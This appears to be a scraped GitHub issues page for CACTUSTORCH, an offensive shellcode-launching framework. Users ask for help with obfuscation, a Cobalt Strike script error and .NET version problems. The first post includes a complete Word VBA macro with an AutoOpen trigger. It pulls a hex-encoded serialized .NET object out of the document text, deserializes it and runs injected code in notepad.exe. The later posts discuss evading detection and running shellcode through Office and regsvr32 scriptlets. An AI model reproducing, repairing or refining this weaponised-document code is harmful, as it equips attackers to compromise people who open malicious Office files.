mdsecactivebreach / cactustorch Goto Github PK

is there a way to add a string reverse function into the split?

Hi Vincent,

Thanks for this awesome project. I'm trying to obfuscate the script a bit by extracting the code and serialized_obj variables from the text in the Word document. All the rest of the code is the same as your original code. All the variables seem to populate correctly, however, at Set d = fmt.Deserialize_2(stm) I'm getting the error:

Apparently it can't deserialize the binary.

I wouldn't normally reach out to you for such issues, but I've been pulling hair out of my head out of frustration. Hope you can identify the issue. Thanks a lot in advance!

Public binary As String
Public code As String

Sub Init()
    binary = "notepad.exe"
    code = getText("AAAAAA")
End Sub

Private Function getText(id)
    Dim res As String
    Dim par As String
    Dim i As Long
    iParCount = ActiveDocument.Paragraphs.Count
    For J = 1 To iParCount
        par = ActiveDocument.Paragraphs(J).Range.Text
        If InStr(par, id) Then
            res = par
        End If
    Next J
    getText = res
End Function

Private Function decodeHex(hex)
    On Error Resume Next
    Dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    Set EL = DM.createElement("tmp")
    EL.dataType = "bin.hex"
    EL.Text = hex
    decodeHex = EL.nodeTypedValue
End Function

Function Run()
    Dim entry_class, serialized_obj
    entry_class = "cactusTorch"
    Dim stm As Object, fmt As Object, al As Object
    Set stm = CreateObject("System.IO.MemoryStream")
    Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
    Set al = CreateObject("System.Collections.ArrayList")

    serialized_obj = getText("00000000000")
    ' serialized_obj = "0001000000FFFFF..." 
    MsgBox Len(serialized_obj)
    ' Len(serialized_obj) = 17957
    Dim dec
    dec = decodeHex(serialized_obj)
    For Each i In dec
        stm.WriteByte i
    Next i
    stm.Position = 0
    
    Dim n As Object, d As Object, o As Object
    Set n = fmt.SurrogateSelector
    Set d = fmt.Deserialize_2(stm)
    al.Add n
    Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
    o.flame binary, code
    
End Function

Sub AutoOpen()
    Init
    Run
End Sub

hello
i'm trying to load the cna script into cobalt strike it's loaded normaly
but when i want to launch it from attacks tab it's not show me the box
of payload generation.
this lines have error please fix them:
[19:57:04] Attempted to call non-existent function &dialog at CACTUSTORCH.cna:736
[19:57:04] Attempted to call non-existent function &dialog_description at CACTUSTORCH.cna:737
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:738
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:739
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:740
[19:57:04] Attempted to call non-existent function &drow_listener_stage at CACTUSTORCH.cna:741
[19:57:04] Attempted to call non-existent function &drow_checkbox at CACTUSTORCH.cna:742
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:743
[19:57:04] Attempted to call non-existent function &drow_combobox at CACTUSTORCH.cna:744
[19:57:04] Attempted to call non-existent function &dbutton_action at CACTUSTORCH.cna:745
[19:57:04] Attempted to call non-existent function &dialog_show at CACTUSTORCH.cna:748

Thanks
Regards

Has this method been successful where only a .NET v4 runtime is present? For example from a default Windows 10 install with Excel 2013, the macro fails on:
Set stm = CreateObject("System.IO.MemoryStream")
The minute I add .NET v2, EXCEL calls the version 2 assembly just fine and runs my payload. Does Excel have known issues with calling the newest .NET v4 assembly? I notice the same behavior if I try to use a scriptlet and call:
Declare Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
I get an error on:
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
If I call the same scriptlet with regsvr32 on Win10 (with only .NET v4) it runs just fine and my shellcode runs. I even see the .net 4 assembly loaded into regsvr32.exe. If I run the javascript standalone through the windows script host, it works fine. Only problem appears to be with Microsoft Office and the way it doesn't seem to be using the .NET v4 library. Thanks!